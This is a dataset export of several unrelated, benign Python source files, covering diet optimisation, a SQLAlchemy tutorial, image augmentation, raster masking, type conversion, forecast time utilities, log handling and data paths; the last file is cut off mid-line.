id
stringlengths
1
8
text
stringlengths
6
1.05M
dataset_id
stringclasses
1 value
6495548
import codecs import copy import pickle import numpy as np import console import constants import regression np.random.seed(11) # This is to pickle all foods in sorted order def pickle_top_foods_for_each_nutrient(pickle_all_foods=True): with open(constants.NUTRIENT_DETAILS_FILE, 'r', encoding='ISO-8859-1') \ as nutrient_data_file: nutrient_data = nutrient_data_file.read().split('\n')[1:] if not pickle_all_foods: nutrient_data = [x for x in nutrient_data if str( int(x.split('^')[0])) in constants.SELECTED_FOOD_IDS] nutrient_data = [x.split("^") for x in nutrient_data] with open(constants.NUTRIENT_DETAILS_FILE, 'r', encoding='ISO-8859-1') \ as nutrient_data_file: mineral_desc = nutrient_data_file.read().split('\n')[0] \ .split('^')[constants.NUTRIENT_START_INDEX:-1] nutrient_data = np.array([x for x in nutrient_data]) nutrient_data = np.concatenate( ( nutrient_data[:, 0:1], nutrient_data[:, constants.NUTRIENT_START_INDEX:-1] ), axis=1 ) nutrient_data[nutrient_data == ''] = '0' nutrient_data = nutrient_data.astype("float") dict_li = [] for i in range(1, 150): temp = nutrient_data[nutrient_data[:, i].argsort()[::-1]] dict_li.append( str(i) + ':' + "('" + mineral_desc[ i - 1] + "_TopFoods',[" + ",".join( '"{0}"'.format(w) for w in temp[:temp.shape[0], [0]].astype('str').reshape( temp.shape[0]).tolist()) + '])') top_nutritious_food = ','.join(dict_li) nutrient_wise_top_foods = eval('{' + top_nutritious_food + '}') if pickle_all_foods: with open(constants.TOP_ALL_FOODS_PER_NUTRIENT_FILE, 'wb') as pickle_file: pickle.dump(nutrient_wise_top_foods, pickle_file) else: with open(constants.TOP_SELECTED_FOODS_PER_NUTRIENT_FILE, 'wb') as pickle_file: pickle.dump(nutrient_wise_top_foods, pickle_file) def build_x_and_y(input_food_list, duplicate_sample_count, daily_limit_list, req_mineral_list): avg = sum(daily_limit_list) / len(daily_limit_list) normalize_list = [avg / x if x > 0 else 1 for x in daily_limit_list] daily_limit_list = [ normalize_list[i] * daily_limit_list[i] for i in range(len(normalize_list)) ] with codecs.open(constants.NUTRIENT_DETAILS_FILE, 'r', encoding='utf-8', errors='ignore') as data: food_items = data.read().split('\n')[1:] food_items = [food_item.split("^") for food_item in food_items] food_dict = {} [food_dict.update({str(int(food_item[0])): food_item}) for food_item in food_items] x = np.array( [[[z * float(food_dict[x][y]) * (float(constants.GRAMS)) / 100 for y in [x1 + constants.NUTRIENT_START_INDEX for x1 in req_mineral_list]] for x in input_food_list] for z in range(1, duplicate_sample_count + 1)]) x = x * normalize_list y = np.array([[x * m for x in daily_limit_list] for m in range(1, duplicate_sample_count + 1)]) return x, y, normalize_list def get_top_foods_for_nutrient(all_foods, index, length): if all_foods: nutrient_wise_top_foods = pickle.load( open(constants.TOP_ALL_FOODS_PER_NUTRIENT_FILE, 'rb')) else: nutrient_wise_top_foods = pickle.load( open(constants.TOP_SELECTED_FOODS_PER_NUTRIENT_FILE, 'rb')) return ( nutrient_wise_top_foods[index + 1][0], [ str(int(float(x))) for x in nutrient_wise_top_foods[index + 1][1][:length + 1] ] ) def get_add_more_list(x, y, theta): dt_product = regression.dot_product(x, theta) # required = y[0] # computed_total = dt_product[0] ratio = (y / dt_product).tolist()[0] difference = (y - dt_product).tolist()[0] add_more_list = [] for i in range(len(ratio)): if ratio[i] > 2 or difference[i] > 50: add_more_list.append(i) return [constants.REQUIRED_NUTRIENT_LIST[x] for x in add_more_list] def get_remove_existing_foods_list(x, y, theta): dt_product = regression.dot_product(x, theta) # required = y[0] # computed_total = dt_product[0] ratio = (y / dt_product).tolist()[0] difference = (y - dt_product).tolist()[0] remove_existing = [] for i in range(len(ratio)): if ratio[i] < 0.5 or difference[i] < (-50): remove_existing.append(i) return [constants.REQUIRED_NUTRIENT_LIST[x] for x in remove_existing] def show_add_more_foods(nutrient_top_foods_dict, final_foods): loop = True while loop: loop_1 = True print("Added extra Foods for todays Meal:") for i in nutrient_top_foods_dict.keys(): print('\t' + nutrient_top_foods_dict[i][0] + ' : ' + ', '.join( nutrient_top_foods_dict[i][1])) print( "\nselect nutrients that you need to add, " "Please enter the number associated with nutrient" ) for i in nutrient_top_foods_dict.keys(): print('\t' + str(i) + " for " + nutrient_top_foods_dict[i][0]) print("\t# to exit application") try: nutrient_key = int(input()) if nutrient_key in nutrient_top_foods_dict.keys(): while loop_1: console.show_products(nutrient_top_foods_dict[nutrient_key] [2]) food_list = nutrient_top_foods_dict[nutrient_key][2] food_key = int(input()) if food_key in range(1, len(food_list) + 1): nutrient_top_foods_dict[nutrient_key][1].append( nutrient_top_foods_dict[nutrient_key][2][ food_key].split('^')[1].replace(',', '')[:25]) final_foods.append( nutrient_top_foods_dict[nutrient_key][2][ food_key].split('^')[0]) else: loop_1 = False except Exception as e: loop = False print( "You chose to exit or gave wrong Input, " "Thank you for using this Application" + str(e) ) return final_foods def show_delete_foods(nutrient_top_foods_dict, final_foods): loop = True while loop: loop_1 = True print("Foods That need to be removed:") print(final_foods) for i in nutrient_top_foods_dict.keys(): print('\t' + nutrient_top_foods_dict[i][0] + ' : ' + ', '.join( nutrient_top_foods_dict[i][1])) print( "\nselect nutrients that you need to remove, " "Please enter the number associated with nutrient" ) for i in nutrient_top_foods_dict.keys(): print('\t' + str(i) + " for " + nutrient_top_foods_dict[i][0]) print("\t# to exit application") try: nutrient_key = int(input()) if nutrient_key in nutrient_top_foods_dict.keys(): while loop_1: console.show_products( nutrient_top_foods_dict[nutrient_key][2] ) food_list = nutrient_top_foods_dict[nutrient_key][2] food_key = int(input()) if food_key in range(1, len(food_list) + 1): nutrient_top_foods_dict[nutrient_key][1].append( nutrient_top_foods_dict[nutrient_key][2][ food_key].split('^')[1].replace(',', '')[:25]) final_foods.append( nutrient_top_foods_dict[nutrient_key][2][ food_key].split('^')[0]) else: loop_1 = False except ValueError: loop = False print( "You chose to exit or gave wrong Input, " "Thank you for using this Application" ) return list(set(final_foods)) def add_more_foods(add_more_list, final_foods): nutrient_top_foods_dict = {} with open(constants.NUTRIENT_DETAILS_FILE, 'r', encoding='ISO-8859-1') as nutrient_details_file: food_items = nutrient_details_file.read().split('\n')[1:] # food_items = open(constants.NUTRIENT_DETAILS_FILE).read().split('\n')[1:] food_items = [food_item.split("^") for food_item in food_items] food_dict = {} [food_dict.update({str(int(food_item[0])): food_item}) for food_item in food_items] for i in range(len(add_more_list)): top_list = [ x for x in get_top_foods_for_nutrient(False, add_more_list[i], 50)[1] if x not in final_foods ] dictt = {i: top_list[i - 1] + '^' + food_dict[top_list[i - 1]][4] for i in range(1, len(top_list) + 1)} nutrient_top_foods_dict.update( {i + 1: (constants.NUTRIENT_LIST[add_more_list[i]], [], dictt)}) final_foods = show_add_more_foods(nutrient_top_foods_dict, final_foods) return final_foods def removeExistingFoods(remove_existing_list, final_foods): nutrient_top_foods_dict = {} with open(constants.NUTRIENT_DETAILS_FILE, 'r', encoding='ISO-8859-1') as nutrient_details_file: food_items = nutrient_details_file.read().split('\n')[1:] # food_items = open(constants.NUTRIENT_DETAILS_FILE).read().split('\n')[1:] food_items = [food_item.split("^") for food_item in food_items] food_dict = {} [food_dict.update({str(int(food_item[0])): food_item}) for food_item in food_items] for i in range(len(remove_existing_list)): top_list = [ x for x in get_top_foods_for_nutrient( False, remove_existing_list[i], 300 )[1] if x in final_foods ] dictt = {i: top_list[i - 1] + '^' + food_dict[top_list[i - 1]][4] for i in range(1, len(top_list) + 1)} nutrient_top_foods_dict.update({i + 1: ( constants.NUTRIENT_LIST[remove_existing_list[i]], [], dictt)}) remove_foods = show_delete_foods(nutrient_top_foods_dict, []) return remove_foods def add_or_remove_foods(x, y, theta, final_foods): print( "Please analyse the output in " + constants.OUTPUT_FILE + "\n" + "Select one of the below items" + "\n\n\t" + "1 For Adding a Food yourself" + "\n\t" + "2 for Adding system analysed Foods" + "\n\t" + "3 for Removing a food item" + "\n\t" + "4 for Removing system analysed Foods" + "\n\t" + "5 for removing Zero weight foods" + "\n\t" + "6 for Running with specific Iterations" + "\n\t" + "# To Continue with previous items" ) try: option = int(input()) if option == 1: print( "Enter the comma separated food item IDs " "that needed to be added. " "for example\n\t11080,11215" ) new_foods = [ x.strip() for x in input().strip().split(',') if x not in final_foods ] if len(new_foods) > 0: append_theta = np.array( [[i] * x.shape[2] for i in np.random.rand(len(new_foods))] ) theta = np.concatenate((theta, append_theta), axis=0) final_foods = final_foods + new_foods return final_foods, theta, 0 else: print("No food item to add") return None elif option == 2: if get_add_more_list(x, y, theta): initial_copy = copy.deepcopy(final_foods) final_foods = add_more_foods(get_add_more_list(x, y, theta), final_foods) if len(final_foods) - len(initial_copy) > 0: append_theta = np.array( [ [i] * x.shape[2] for i in np.random.rand(len(final_foods) - len(initial_copy)) ] ) theta = np.concatenate((theta, append_theta), axis=0) return final_foods, theta, 0 else: print("No food items to Add based on Analysis") return None elif option == 3: print( "Enter the comma separated food " "item IDs that needed to be deleted." "for example\n\t11080,11215" ) remove_foods = list( set( [x.strip() for x in str(input()).strip().split(',') if x in final_foods] ) ) if len(remove_foods) > 0: for food in remove_foods: indx = final_foods.index(food) final_foods.remove(food) theta = np.delete(theta, indx, axis=0) return final_foods, theta, 0 else: print("No food items to delete") return None elif option == 4: if get_remove_existing_foods_list(x, y, theta): remove_foods = removeExistingFoods( get_remove_existing_foods_list(x, y, theta), final_foods ) if len(remove_foods) > 0: for food in remove_foods: indx = final_foods.index(food) final_foods.remove(food) theta = np.delete(theta, indx, axis=0) return final_foods, theta, 0 else: print("No food items to delete based on Analysis") return None elif option == 5: while True: theta_list = theta[:, 0].tolist() try: indx = theta_list.index(0.0) food = final_foods[indx] final_foods.remove(food) theta = np.delete(theta, indx, axis=0) except Exception as e: print("Exception" + str(e)) break return final_foods, theta, 0 elif option == 6: print("Enter the reqired iterations") iters = int(input()) if iters > 0: return final_foods, theta, iters else: return final_foods, theta, 0 else: print("Invalid option. Thanks for suing this Application.") return None except Exception as e: print( "You chose to exit or gave wrong Input, " "Thank you for using this Application\nThe exception is \n" + str(e) ) return final_foods, theta, 0
StarcoderdataPython
6700735
<gh_stars>0 from sqlalchemy import create_engine, Column, Integer, String, ForeignKey, DATETIME from sqlalchemy.ext.declarative import declarative_base from sqlalchemy.orm import sessionmaker, relationship, backref from datetime import datetime import time # TODO: db_uri # dialect+driver://username:password@host:port/database?charset=utf8 DB_URI = 'mysql+pymysql://root:[email protected]:3300/first_sqlalchemy?charset=utf8' engine = create_engine(DB_URI) Base = declarative_base(bind=engine) session = sessionmaker(bind=engine)() # TODO: 定义User模型 class User(Base): __tablename__ = 'user' id = Column(Integer, primary_key=True, autoincrement=True) name = Column(String(50), nullable=False) create_time = Column(DATETIME, nullable=False, default=datetime.now) def __repr__(self): return '<User(id={id}, name={name}, create_time={create_time})>'.format(id=self.id, name=self.name, create_time=self.create_time) # TODO: 定义Article模型 class Article(Base): __tablename__ = 'article' id = Column(Integer, primary_key=True, autoincrement=True) title = Column(String(50), nullable=False) create_time = Column(DATETIME, nullable=False, default=datetime.now) uid = Column(Integer, ForeignKey('user.id')) # TODO: 在模型中定义relationship的order_by参数: 正序 # authors = relationship('User', backref=backref('articles', order_by=create_time)) # TODO: 在模型中定义relationship的order_by参数: 倒序 # authors = relationship('User', backref=backref('articles', order_by=create_time.desc())) authors = relationship('User', backref=backref('articles')) # TODO: 3.在模型中定义__mapper_args__: 正序 # __mapper_args__ = { # 'order_by': create_time # } # TODO: 3.在模型中定义__mapper_args__: 倒序 __mapper_args__ = { 'order_by': create_time.desc() } def __repr__(self): return '<Article(id=%s, title=%s, create_time=%s)>' % (self.id, self.title, self.create_time) # TODO: 删除数据表 # Base.metadata.drop_all() # TODO: 创建数据表 # Base.metadata.create_all() # TODO: 新增数据 # user = User(name='zhiliao') # article1 = Article(title='python') # user.articles.append(article1) # session.add(user) # session.commit() # # time.sleep(2) # # article2 = Article(title='flask') # user.articles.append(article2) # session.add(user) # session.commit() # # time.sleep(2) # # article3 = Article(title='django') # user.articles.append(article3) # session.add(user) # session.commit() # TODO: 1.order_by # TODO: 1.1 正序排序 # articles = session.query(Article).order_by(Article.create_time).all() # articles = session.query(Article).order_by('create_time').all() # print(articles) # TODO: 1.2 倒序排序 # articles = session.query(Article).order_by(Article.create_time.desc()).all() # articles = session.query(Article).order_by('-create_time').all() # print(articles) # TODO: 2.在模型中定义relationship的order_by参数 # TODO: 2.1 正序排序 # TODO: 2.2 倒序排序 # TODO: 3.在模型中定义__mapper_args__ # TODO: 3.1 正序排序 # TODO: 3.2 倒序排序 users = session.query(User).first() print(users.articles)
StarcoderdataPython
6492641
<reponame>NateThom/contrastive_learning import torch import torchvision.transforms.functional as TF import torchvision.transforms as T class MyRandomColorJitter(object): """Crop randomly the image and masks in a sample output_size (tuple or int): Desired output size. If int, square crop is made. """ def __init__(self): self.jitter = T.ColorJitter(0.8, 0.8, 0.8, 0.2) def __call__(self, sample): image = sample["image"] jitter_probability = torch.rand(1) if jitter_probability[0] > 0.5: image = self.jitter(image) if "image2" in sample: image2 = sample["image2"] jitter_probability = torch.rand(1) if jitter_probability[0] > 0.5: image2 = self.jitter(image2) return {'image': image, 'image2': image2, 'label': sample['label']} return {'image': image, 'label': sample['label']}
StarcoderdataPython
5184818
<reponame>harshal306/radiometric_normalization ''' Copyright 2015 Planet Labs, Inc. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ''' import numpy def pixel_list_to_array(pixel_locations, shape): ''' Transforms a list of pixel locations into a 2D array. :param tuple pixel_locations: A tuple of two lists representing the x and y coordinates of the locations of a set of pixels (i.e. the output of numpy.nonzero(valid_pixels) where valid_pixels is a 2D boolean array representing the pixel locations) :param list active_pixels: A list the same length as the x and y coordinate lists within pixel_locations representing whether a pixel location should be represented in the mask or not :param tuple shape: The shape of the output array consisting of a tuple of (height, width) :returns: A 2-D boolean array representing active pixels ''' mask = numpy.zeros(shape, dtype=numpy.bool) mask[pixel_locations] = True return mask def trim_pixel_list(pixel_locations, active_pixels): ''' Trims the list of pixel locations to only the active pixels. :param tuple pixel_locations: A tuple of two lists representing the x and y coordinates of the locations of a set of pixels (i.e. the output of numpy.nonzero(valid_pixels) where valid_pixels is a 2D boolean array representing the pixel locations) :param list active_pixels: A list the same length as the x and y coordinate lists within pixel_locations representing whether a pixel location should be represented in the mask or not :returns: A tuple of two lists representing the x and y coordinates of the locations of active pixels ''' active_pixels = numpy.nonzero(active_pixels)[0] return (pixel_locations[0][active_pixels], pixel_locations[1][active_pixels]) def combine_valid_pixel_arrays(list_of_pixel_arrays): ''' Combines a list of 2D boolean pixel arrays that represent locations of valid pixels with only the pixels that are common in all bands. :param list list_of_pixel_arrays: A list of 2D boolean arrays representing the valid pixel locations :returns: A 2D boolean array representing common valid pixels ''' return numpy.logical_and.reduce(list_of_pixel_arrays) def combine_valid_pixel_lists(list_of_pixel_locations): ''' Combines a list of valid pixel x and y locations (for a 2D array) with only the pixels that are in common in all bands. :param list list_of_pixel_locations: A list of tuples that contain two lists representing the x and y coordinates of the locations of valid pixels (i.e. the output of numpy.nonzero(valid_pixels) where valid_pixels is a 2D boolean array representing the valid pixel locations) :returns: A 2D boolean array representing common valid pixels ''' max_x = max([max(l[0]) for l in list_of_pixel_locations]) max_y = max([max(l[1]) for l in list_of_pixel_locations]) shape = (max_x + 1, max_y + 1) list_of_pixel_arrays = [pixel_list_to_array(p, shape) for p in list_of_pixel_locations] return numpy.nonzero(combine_valid_pixel_arrays(list_of_pixel_arrays))
StarcoderdataPython
40784
"""doufo.convert abstract class of `dataType` converters. Example: Todo: Author: """ from .function import func from functools import wraps, cmp_to_key from multipledispatch import Dispatcher from typing import Callable, TypeVar __all__ = ['converters', 'convert_to', 'convert'] T = TypeVar('T') B = TypeVar('B') class ConvertersDict: """doufo.ConverterDict: to define dictionary-like class to store converters. Note, this class is hidden, and been used as `converters` Attributes: `attr1` (type): Description """ def __init__(self): """initial as a empty `dictionary`""" self.converters = {} def sorted_converters_keys(self): """doufo.ConvertDict().sorted_converters_key: sort converter keys sort key according to their relationship (if parent- and child-class) or their hash value. Args: `self` """ keys = sorted(self.converters.keys(), key=cmp_to_key(tuple_type_compare)) return {k: self.converters[k] for k in keys} def register(self, src: type, tar: type) -> Callable[[T], B]: """doufo.ConverterDict().register(): A decorator factory to define typing converting decorator Attributes: `self` `src` (`type`): source `type`, `tar` (`type`): target `type`, Returns: `f` (`Callable[[T], B]`): a decorater that defines a converter """ def deco(f): self.converters[(src, tar)] = f self.converters = self.sorted_converters_keys() return f return deco def convert(self, src: type, tar: type) -> Callable[[T], B]: """ doufo.ConvertDict().convert: define a converter from `type src` to `type tar` Attibutes: `self` `src` (`type`): source `type`, `tar` (`type`): target `type`, Returns: `converter` (`Callable[[T], B]`): converter from `type src` to `type tar` """ return self.converters[(src, tar)] converters = ConvertersDict() @func() def convert_to(o, target_type): """doufo.convert_to: convert forward Args: `o` (`A`): any object `target_type` (`type`): destination type Returns: return (`target_type`):description: object `o` in type of `target_type` Raises: """ return converters.convert(type(o), target_type)(o) @func() def convert(o, target_type): """doufo.convert: convert backwards Args: `o` (`A`): any object `target_type` (`type`): destination type Returns: return (`target_type`):description: object `o` in type of `target_type` Raises: """ return converters.convert(type(o), target_type)(o) def tuple_type_compare(types0, types1): """doufo.tuple_type_compare: compare two types if `types0` is 'bigger' than `types1`, return negative (<0); otherwise, return positive (>0). Here 'bigger' is defined by whether they are 'parent and child', or ituitively bigger Args: types0 (`type`): types0 types1 (`type`): types1 Returns: return (`int`): comparison results Raises: """ compares = [single_type_compare(types0[0], types1[0]), single_type_compare(types0[1], types1[1])] if compares[0] != 0: return compares[0] if compares[1] != 0: return compares[1] if types0[0] is types1[0] and types0[1] is types1[1]: return 0 return hash(types1) - hash(types0) def single_type_compare(t0, t1): if t0 is t1: return 0 if issubclass(t0, t1): return 1 if issubclass(t1, t0): return -1 return 0
StarcoderdataPython
1953455
<filename>Conversor de bases numericas.py num = int(input('Informe um número para a conversão: ')) print('Digite 1 para BINÁRIO') print('Digite 2 para OCTAL') print('Digite 3 para HEXADECIMAL') base = int(input('Escolha a base numérica: ')) if base == 1: print('{} em BINÁRIO é igual a {}'.format(num, bin(num)[2:])) elif base == 2: print('{} em OCTAL é igual a {}'.format(num, oct(num)[2:])) elif base == 3: print('{} em HEXADECIMAL é igual a {}'.format(num, hex(num)[2:])) else: print('valor inválido!')
StarcoderdataPython
4955390
<filename>improver/utilities/temporal.py # -*- coding: utf-8 -*- # ----------------------------------------------------------------------------- # (C) British Crown Copyright 2017-2019 Met Office. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # * Redistributions of source code must retain the above copyright notice, this # list of conditions and the following disclaimer. # # * Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # * Neither the name of the copyright holder nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. """General utilities for parsing and extracting cubes at times""" import warnings from datetime import datetime, timezone import cf_units import iris import numpy as np from iris import Constraint from iris.time import PartialDateTime def cycletime_to_datetime(cycletime, cycletime_format="%Y%m%dT%H%MZ"): """Convert a string representating the cycletime of the format YYYYMMDDTHHMMZ into a datetime object. Args: cycletime (str): A cycletime that can be converted into a datetime using the cycletime_format supplied. cycletime_format (str): String containing the desired format for the cycletime. Returns: datetime: A correctly formatted datetime object. """ return datetime.strptime(cycletime, cycletime_format) def datetime_to_cycletime(adatetime, cycletime_format="%Y%m%dT%H%MZ"): """Convert a datetime object into a string representing the cycletime of the format YYYYMMDDTHHMMZ. Args: adatetime (datetime.datetime): A datetime that can be converted into a cycletime using the cycletime_format supplied. cycletime_format (str): String containing the desired format for the cycletime. Returns: str: A correctly formatted string. """ return datetime.strftime(adatetime, cycletime_format) def cycletime_to_number( cycletime, cycletime_format="%Y%m%dT%H%MZ", time_unit="hours since 1970-01-01 00:00:00", calendar="gregorian", ): """Convert a cycletime of the format YYYYMMDDTHHMMZ into a numeric time value. Args: cycletime (str): A cycletime that can be converted into a datetime using the cycletime_format supplied. cycletime_format (str): String containg the appropriate directives to indicate how the output datetime should display. time_unit (str): String representation of the cycletime units. calendar (str): String describing the calendar used for defining the cycletime. The choice of calendar must be supported by cf_units.CALENDARS. Returns: float: A numeric value to represent the datetime using assumed choices for the unit of time and the calendar. """ dtval = cycletime_to_datetime(cycletime, cycletime_format=cycletime_format) return cf_units.date2num(dtval, time_unit, calendar) def iris_time_to_datetime(time_coord, point_or_bound="point"): """ Convert iris time to python datetime object. Working in UTC. Args: time_coord (iris.coords.Coord): Iris time coordinate element(s). Returns: list of datetime.datetime: The time element(s) recast as a python datetime object. """ coord = time_coord.copy() coord.convert_units("seconds since 1970-01-01 00:00:00") if point_or_bound == "point": datetime_list = [value.point for value in coord.cells()] elif point_or_bound == "bound": datetime_list = [value.bound for value in coord.cells()] return datetime_list def datetime_to_iris_time(dt_in): """ Convert python datetime.datetime into seconds since 1970-01-01 00Z. Args: dt_in (datetime.datetime): Time to be converted into seconds since 1970-01-01 00Z. Returns: float: Time since epoch in the seconds as desired dtype. """ result = dt_in.replace(tzinfo=timezone.utc).timestamp() return np.int64(result) def datetime_constraint(time_in, time_max=None): """ Constructs an iris equivalence constraint from a python datetime object. Args: time_in (datetime.datetime): The time to be used to build an iris constraint. time_max (datetime.datetime): Optional max time, which if provided leads to a range constraint being returned up to < time_max. Returns: iris.Constraint: An iris constraint to be used in extracting data at the given time from a cube. """ time_start = PartialDateTime(time_in.year, time_in.month, time_in.day, time_in.hour) if time_max is None: time_extract = Constraint(time=lambda cell: cell.point == time_start) else: time_limit = PartialDateTime( time_max.year, time_max.month, time_max.day, time_max.hour ) time_extract = Constraint(time=lambda cell: time_start <= cell < time_limit) return time_extract def extract_cube_at_time(cubes, time, time_extract): """ Extract a single cube at a given time from a cubelist. Args: cubes (iris.cube.CubeList): CubeList of a given diagnostic over several times. time (datetime.datetime object): Time at which forecast data is needed. time_extract (iris.Constraint): Iris constraint for the desired time. Returns: iris.cube.Cube: Cube of data at the desired time. Raises: ValueError if the desired time is not available within the cubelist. """ try: (cube_in,) = cubes.extract(time_extract) return cube_in except ValueError: msg = "Forecast time {} not found within data cubes.".format( time.strftime("%Y-%m-%d:%H:%M") ) warnings.warn(msg) return None def extract_nearest_time_point(cube, dt, time_name="time", allowed_dt_difference=0): """Find the nearest time point to the time point provided. Args: cube (iris.cube.Cube): Cube or CubeList that will be extracted from using the supplied time_point dt (datetime.datetime): Datetime representation of a time that will be used within the extraction from the cube supplied. time_name (str): Name of the "time" coordinate that will be extracted. This must be "time" or "forecast_reference_time". allowed_dt_difference (int): An int in seconds to define a limit to the maximum difference between the datetime provided and the time points available within the cube. If this limit is exceeded, then an error is raised. This must be defined in seconds. Default is 0. Returns: iris.cube.Cube: Cube following extraction to return the cube that is nearest to the time point supplied. Raises: ValueError: The requested datetime is not available within the allowed difference. """ if time_name not in ["time", "forecast_reference_time"]: msg = ( "{} is not a valid time_name. " "The time_name must be either " "'time' or 'forecast_reference_time'." ) raise ValueError(msg) time_point = datetime_to_iris_time(dt) time_point_index = cube.coord(time_name).nearest_neighbour_index(time_point) (nearest_dt,) = iris_time_to_datetime( cube.coord(time_name).copy()[time_point_index] ) if abs((dt - nearest_dt).total_seconds()) > allowed_dt_difference: msg = ( "The datetime {} is not available within the input " "cube within the allowed difference {} seconds. " "The nearest datetime available was {}".format( dt, allowed_dt_difference, nearest_dt ) ) raise ValueError(msg) constr = iris.Constraint(coord_values={time_name: nearest_dt}) cube = cube.extract(constr) return cube
StarcoderdataPython
3372793
<gh_stars>0 import json from logzio.handler import LogzioHandler class ExtensionLogHandler(LogzioHandler): def __init__(self, *args, **kwargs): self.default_extra_fields = kwargs.pop('default_extra_fields') super().__init__(*args, **kwargs) def extra_fields(self, message): extra_fields = super().extra_fields(message) extra_fields.update(self.default_extra_fields) return extra_fields class RequestLogger: def __init__(self, logger): self.logger = logger def obfuscate(self, value): if value.startswith('ApiKey SU-'): return value.split(':')[0] + ':' + '*' * 10 else: return '*' * 20 def log_request(self, method, url, kwargs): other_args = {k: v for k, v in kwargs.items() if k not in ('headers', 'json', 'params')} if 'params' in kwargs: url += '&' if '?' in url else '?' url += '&'.join([f'{k}={v}' for k, v in kwargs['params'].items()]) lines = [ '--- HTTP Request ---', f'{method.upper()} {url} {other_args if other_args else ""}', ] if 'headers' in kwargs: for k, v in kwargs['headers'].items(): if k.lower() == 'authorization': v = self.obfuscate(v) lines.append(f'{k}: {v}') if 'json' in kwargs: lines.append(json.dumps(kwargs['json'], indent=4)) lines.append('') self.logger.debug('\n'.join(lines)) def log_response(self, response): reason = response.raw.reason if getattr(response, 'raw', None) else response.reason_phrase lines = [ '--- HTTP Response ---', f'{response.status_code} {reason}', ] for k, v in response.headers.items(): lines.append(f'{k}: {v}') if response.headers.get('Content-Type', None) == 'application/json': lines.append(json.dumps(response.json(), indent=4)) lines.append('') self.logger.debug('\n'.join(lines))
StarcoderdataPython
6624677
<filename>src/pyast_utils.py # Copyright (c) 2019, IBM Research. # # Author: <NAME> <<EMAIL>> # # vim: set expandtab softtabstop=4 tabstop=4 shiftwidth=4: import itertools import copy import ast as pyast class StructureTupleYields(pyast.NodeTransformer): """ AST transformer for "structuring" yielded tuples For example, if structure is (2,3), then a yield expression, yielding a 5-tuple: yield (a,b,c,d,e) will be transformed to yield ((a,b,),(c,d,e)). """ def __init__(self, structure): super().__init__() self.structure = structure def visit_Yield(self, node): # This yield is not a tuple, do nothing if not isinstance(node.value, pyast.Tuple): print( "*" * 10, "Yiedling something which is not a tuple. Doing nothing", ) return node elts = node.value.elts ctx = node.value.ctx nelts = len(elts) if nelts != sum(self.structure): print( "*" * 10, "Yiedling a tuple with size=%d while structure=%s. Doing nothing." % (nelts, structure), ) return node new_elts = [] elts_iter = iter(elts) for n in self.structure: xelts = [x for x in itertools.islice(elts_iter, n)] xtuple = pyast.Tuple(xelts, copy.copy(ctx)) new_elts.append(xtuple) # sanity check that there are no more elements in the iterator # (they shouldn't be since we checked the length) try: next(elts_iter) assert False except StopIteration: pass new_node = pyast.Yield(pyast.Tuple(new_elts, copy.copy(ctx))) return pyast.copy_location(new_node, node)
StarcoderdataPython
6452724
"""Directory structure and paths.""" import platform from pathlib import Path URL = { 0: 'http://s3.eu-central-1.amazonaws.com/boo2012/data_reference.rar', 2012: 'http://www.gks.ru/opendata/storage/7708234640-bdboo2012/data-20181029t000000-structure-20121231t000000.csv', 2013: 'http://www.gks.ru/opendata/storage/7708234640-bdboo2013/data-20181029t000000-structure-20131231t000000.csv', 2014: 'http://www.gks.ru/opendata/storage/7708234640-bdboo2014/data-20181029t000000-structure-20141231t000000.csv', 2015: 'http://www.gks.ru/opendata/storage/7708234640-bdboo2015/data-20181029t000000-structure-20151231t000000.csv', 2016: 'http://www.gks.ru/opendata/storage/7708234640-bdboo2016/data-20181029t000000-structure-20161231t000000.csv', 2017: 'http://www.gks.ru/opendata/storage/7708234640-bdboo2017/data-20181029t000000-structure-20171231t000000.csv', } __all__ = ['url', 'url_local_path', 'csv_path_raw', 'csv_path_interim', 'csv_path_processed', ] PROJECT_ROOT = Path(__file__).parents[1] IS_WINDOWS = (platform.system() == 'Windows') # RAR executable if IS_WINDOWS: UNPACK_RAR_EXE = str(PROJECT_ROOT / 'bin' / 'unrar.exe') else: UNPACK_RAR_EXE = 'unrar' def url(year: int): return URL[year] assert url(2012) == URL[2012] def make_subfolder(subfolder: str): """Return /data/<subfolder> path. Creates subfolders if they do not exist.""" check_subfolder(subfolder) folder = PROJECT_ROOT / 'data' / subfolder if not folder.exists(): folder.mkdir(parents=True) return folder def check_subfolder(name:str): if name not in ['external', 'raw', 'interim', 'processed']: raise ValueError(f"worng subfolder name: {name}") def url_filename(url): return url.split('/')[-1] assert url_filename(URL[2012]) == 'data-20181029t000000-structure-20121231t000000.csv' def url_local_path(year: int): return make_subfolder('external') / url_filename(URL[year]) def csv_filename(year: int): return f'{year}.csv' def _path_as_string(year, subfolder): return str(make_subfolder(subfolder) / csv_filename(year)) def csv_path_raw(year): return _path_as_string(year, 'raw') def csv_path_interim(year): return _path_as_string(year, 'interim') def csv_path_processed(year): return _path_as_string(year, 'processed') assert csv_path_raw(2012).endswith('\\data\\raw\\2012.csv') assert csv_path_interim(2012).endswith('\\data\\interim\\2012.csv') assert 